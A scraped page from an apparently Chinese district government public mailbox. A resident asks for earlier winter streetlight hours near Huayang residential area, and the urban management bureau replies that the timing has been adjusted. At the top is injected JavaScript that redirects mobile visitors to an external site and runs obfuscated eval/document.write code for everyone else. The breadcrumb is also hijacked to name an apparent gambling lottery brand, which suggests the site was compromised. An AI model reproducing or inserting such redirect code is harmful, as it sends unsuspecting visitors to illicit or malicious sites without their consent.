function moble(){ var ss = '
'; if ((navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i))) { window.location.href = "http://fd699.vip" }else{ eval("do" + "cu" + "ment.wr" + "ite('" + ss + "');"); } } moble();



您的位置:大发快三官方开奖 >
互动交流 > 区长信箱


调整华阳小区外侧路灯开启时间

信件编号: 20201023001 来信时间: 2020-10-23 13:27:44
信件类型: 我要建议 姓名: 徐****
内容: 现在天黑的早,路灯还是到晚上19:00点才开,现在18点就差不多就黑天了,路窄车多人多,麻烦主管部门按冬季时令调整路灯开启时间,谢谢。
答复情况:
答复单位:繁昌区城市管理局    答复时间:2020-10-25 17:38:56

答复意见:

“徐****”网友:
    您好!对您反映的问题,繁昌区城管局答复如下:
    该路段路灯是按照季节变化调整开关灯时间,目前开关灯时间已进行调整。
    以上答复,如有疑问,可电话咨询,咨询电话:0553-7915036。


用户满意度评价:
  • 查询密码:

  • 评价结果: